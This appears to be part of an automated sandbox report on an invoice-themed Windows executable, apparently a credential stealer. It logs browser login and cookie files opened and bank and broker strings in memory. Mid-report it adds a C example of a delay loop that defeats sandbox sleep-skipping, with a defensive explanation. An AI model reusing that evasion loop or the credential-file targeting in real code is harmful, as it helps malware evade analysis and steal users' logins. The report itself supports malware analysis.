Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744 Thread sleep time: -597187s >= -30000s
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744 Thread sleep time: -597078s >= -30000s
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744 Thread sleep time: -596968s >= -30000s
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744 Thread sleep time: -596859s >= -30000s
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744 Thread sleep time: -596749s >= -30000s
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744 Thread sleep time: -596640s >= -30000s
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744 Thread sleep time: -596531s >= -30000s
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744 Thread sleep time: -596421s >= -30000s
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744 Thread sleep time: -596312s >= -30000s
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744 Thread sleep time: -596202s >= -30000s
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744 Thread sleep time: -596078s >= -30000s
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744 Thread sleep time: -595966s >= -30000s
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744 Thread sleep time: -595843s >= -30000s
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744 Thread sleep time: -595733s >= -30000s
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744 Thread sleep time: -595624s >= -30000s
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744 Thread sleep time: -595515s >= -30000s
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744 Thread sleep time: -595404s >= -30000s
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744 Thread sleep time: -595296s >= -30000s
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744 Thread sleep time: -595187s >= -30000s
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744 Thread sleep time: -595077s >= -30000s
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744 Thread sleep time: -594968s >= -30000s
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744 Thread sleep time: -594786s >= -30000s
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744 Thread sleep time: -594475s >= -30000s
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744 Thread sleep time: -594338s >= -30000s
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744 Thread sleep time: -594217s >= -30000s
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744 Thread sleep time: -594093s >= -30000s
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744 Thread sleep time: -593968s >= -30000s
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe TID: 744 Thread sleep time: -593858s >= -30000s
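The delay values on thread 744 start at 600000 ms (10 minutes) and shrink by roughly 109 ms per call, while thread 5784 issued 8108 and then 1727 sleeps. That shape is what a delay loop produces when it re-arms the sleep with the time still outstanding and the sandbox cuts every sleep short without moving the clock forward: the sample keeps waiting until real time has passed, and the report fills with thousands of slightly decreasing entries. (The very first value, 922337203685477 ms, is .NET's TimeSpan.MaxValue expressed in milliseconds, consistent with the CLR stage loaded via mscoree.dll earlier in the report.) The C program below is an added illustration of such a loop, not code recovered from the sample; the clock and sleep primitives are injected, the 109 ms per-call step and the 16-entry argument buffer are assumptions for the constructed sandbox model, and the number 600000 is the target from the report.

```c
/* Added example, not the sample's code: a sleep-skipping-resistant delay loop
 * that re-arms Sleep() with the remaining time, driven here by a constructed
 * model of a sandbox that returns from every Sleep() after a fixed short time. */
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

typedef uint64_t (*tick_fn)(void);          /* milliseconds, like GetTickCount64() */
typedef void     (*sleep_fn)(uint32_t ms);  /* like Sleep() */

/* Wait until `target_ms` of wall-clock time has elapsed. If the sleep returns
 * early, recompute the remainder from the clock and sleep again. Returns the
 * number of sleep calls made; `max_calls` is a safety bound for the model. */
unsigned delay_until_elapsed(uint64_t target_ms, tick_fn now, sleep_fn do_sleep,
                             unsigned max_calls)
{
    uint64_t start = now();
    unsigned calls = 0;
    for (;;) {
        uint64_t elapsed = now() - start;
        if (elapsed >= target_ms || calls >= max_calls)
            return calls;
        uint64_t remaining = target_ms - elapsed;
        do_sleep((uint32_t)remaining);       /* remaining <= target_ms, fits uint32_t */
        calls++;
    }
}

/* --- constructed sandbox model; these are not real OS calls --- */
#define MODEL_ARGS 16
static uint64_t model_clock_ms;             /* what the "victim" clock reports */
static uint32_t model_skip_ms;              /* real time consumed per Sleep() call */
static uint32_t model_args[MODEL_ARGS];     /* first few Sleep() arguments seen */
static unsigned model_calls;

uint64_t model_now(void) { return model_clock_ms; }

/* A sandbox that "skips" sleeps returns after model_skip_ms no matter what was
 * requested, and only advances the clock by the time that really passed. */
void model_sleep(uint32_t ms)
{
    uint32_t slept = ms < model_skip_ms ? ms : model_skip_ms;
    if (model_calls < MODEL_ARGS)
        model_args[model_calls] = ms;
    model_calls++;
    model_clock_ms += slept;
}

void model_reset(uint32_t skip_ms)
{
    model_clock_ms = 0;
    model_skip_ms = skip_ms;
    model_calls = 0;
}

uint32_t model_arg(unsigned i) { return i < MODEL_ARGS ? model_args[i] : 0; }

int main(void)
{
    /* Sandbox that cuts every sleep to ~109 ms: thousands of calls, each asking
     * for slightly less than the previous one, exactly the pattern reported. */
    model_reset(109);
    unsigned n = delay_until_elapsed(600000, model_now, model_sleep, 100000);
    printf("skipping sandbox: Sleep() called %u times; first arguments %u, %u, %u\n",
           n, model_arg(0), model_arg(1), model_arg(2));

    /* A host that lets the sleep run to completion sees a single call. */
    model_reset(600000);
    printf("honest host: Sleep() called %u time(s)\n",
           delay_until_elapsed(600000, model_now, model_sleep, 100000));
    return 0;
}
```

The defensive reading is that shortening Sleep() on its own does not buy anything against this loop; the sandbox also has to advance every clock the sample can consult (tick count, QueryPerformanceCounter, the system time, and in .NET the Stopwatch and DateTime APIs) by the skipped amount, or it will either burn the full ten minutes or, with a call budget, never reach the payload.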
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 0_2_00406370 FindFirstFileW,FindClose, 0_2_00406370
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 0_2_0040581E GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 0_2_0040581E
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 0_2_004027FB FindFirstFileW, 0_2_004027FB
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_00406370 FindFirstFileW,FindClose, 4_2_00406370
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_0040581E DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 4_2_0040581E
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 4_2_004027FB FindFirstFileW, 4_2_004027FB
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Thread delayed: delay time: 600000
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Thread delayed: delay time: 599874
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Thread delayed: delay time: 599765
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Thread delayed: delay time: 599656
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Thread delayed: delay time: 599546
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Thread delayed: delay time: 599436
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Thread delayed: delay time: 599328
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Thread delayed: delay time: 599218
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Thread delayed: delay time: 599109
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Thread delayed: delay time: 598999
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Thread delayed: delay time: 598890
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Thread delayed: delay time: 598781
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Thread delayed: delay time: 598671
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Thread delayed: delay time: 598562
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Thread delayed: delay time: 598453
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Thread delayed: delay time: 598343
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Thread delayed: delay time: 598234
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Thread delayed: delay time: 598124
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Thread delayed: delay time: 598015
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Thread delayed: delay time: 597906
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Thread delayed: delay time: 597795
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Thread delayed: delay time: 597646
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Thread delayed: delay time: 597527
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Thread delayed: delay time: 597406
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Thread delayed: delay time: 597296
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Thread delayed: delay time: 597187
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Thread delayed: delay time: 597078
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Thread delayed: delay time: 596968
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Thread delayed: delay time: 596859
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Thread delayed: delay time: 596749
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Thread delayed: delay time: 596640
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Thread delayed: delay time: 596531
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Thread delayed: delay time: 596421
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Thread delayed: delay time: 596312
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Thread delayed: delay time: 596202
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Thread delayed: delay time: 596078
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Thread delayed: delay time: 595966
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Thread delayed: delay time: 595843
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Thread delayed: delay time: 595733
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Thread delayed: delay time: 595624
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Thread delayed: delay time: 595515
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Thread delayed: delay time: 595404
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Thread delayed: delay time: 595296
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Thread delayed: delay time: 595187
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Thread delayed: delay time: 595077
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Thread delayed: delay time: 594968
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Thread delayed: delay time: 594786
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Thread delayed: delay time: 594475
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Thread delayed: delay time: 594338
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Thread delayed: delay time: 594217
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Thread delayed: delay time: 594093
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Thread delayed: delay time: 593968
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Thread delayed: delay time: 593858
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.00000000387AE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.00000000387AE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.00000000387AE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.000000003848F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.000000003848F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.000000003848F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696428655
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3277055717.0000000006E78000.00000004.00000020.00020000.00000000.sdmp, Wuerth_factura_4052073226..exe, 00000004.00000002.3277055717.0000000006ED7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.000000003848F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.00000000387AE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696428655
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.00000000387AE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.000000003848F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.00000000387AE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.00000000387AE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.000000003848F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696428655
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.000000003848F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696428655o
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.000000003848F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.000000003848F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.00000000387AE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.000000003848F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.000000003848F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.00000000387AE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.00000000387AE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.000000003848F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.00000000387AE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.000000003848F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.000000003848F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.00000000387AE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.000000003848F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696428655f
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.00000000387AE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.000000003848F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.00000000387AE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.00000000387AE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.00000000387AE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.000000003848F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.00000000387AE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696428655j
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.000000003848F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.00000000387AE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.000000003848F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.000000003848F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.000000003848F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.000000003848F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.000000003848F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.000000003848F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.000000003848F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696428655s
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.00000000387AE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.000000003848F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.000000003848F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.00000000387AE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696428655f
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.00000000387AE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696428655s
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.000000003848F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.00000000387AE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696428655o
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.000000003848F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696428655j
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.000000003848F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.00000000387AE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.00000000387AE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696428655
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.00000000387AE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.00000000387AE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.00000000387AE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.00000000387AE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.00000000387AE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.00000000387AE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.000000003848F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3277055717.0000000006ED7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWC
Source: Wuerth_factura_4052073226..exe, 00000004.00000002.3298502596.00000000387AE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 0_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW, 0_2_10001B18
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Memory allocated: page read and write | page guard
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Process created: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe "C:\Users\user\Desktop\Wuerth_factura_4052073226..exe"
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Queries volume information: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe VolumeInformation
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Code function: 0_2_0040604F GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW, 0_2_0040604F
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match File source: 00000004.00000002.3296722431.0000000037401000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Wuerth_factura_4052073226..exe PID: 3148, type: MEMORYSTR
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: C:\Users\user\Desktop\Wuerth_factura_4052073226..exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: Yara match File source: Process Memory Space: Wuerth_factura_4052073226..exe PID: 3148, type: MEMORYSTR

Remote Access Functionality

Source: Yara match File source: 00000004.00000002.3296722431.0000000037401000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Wuerth_factura_4052073226..exe PID: 3148, type: MEMORYSTR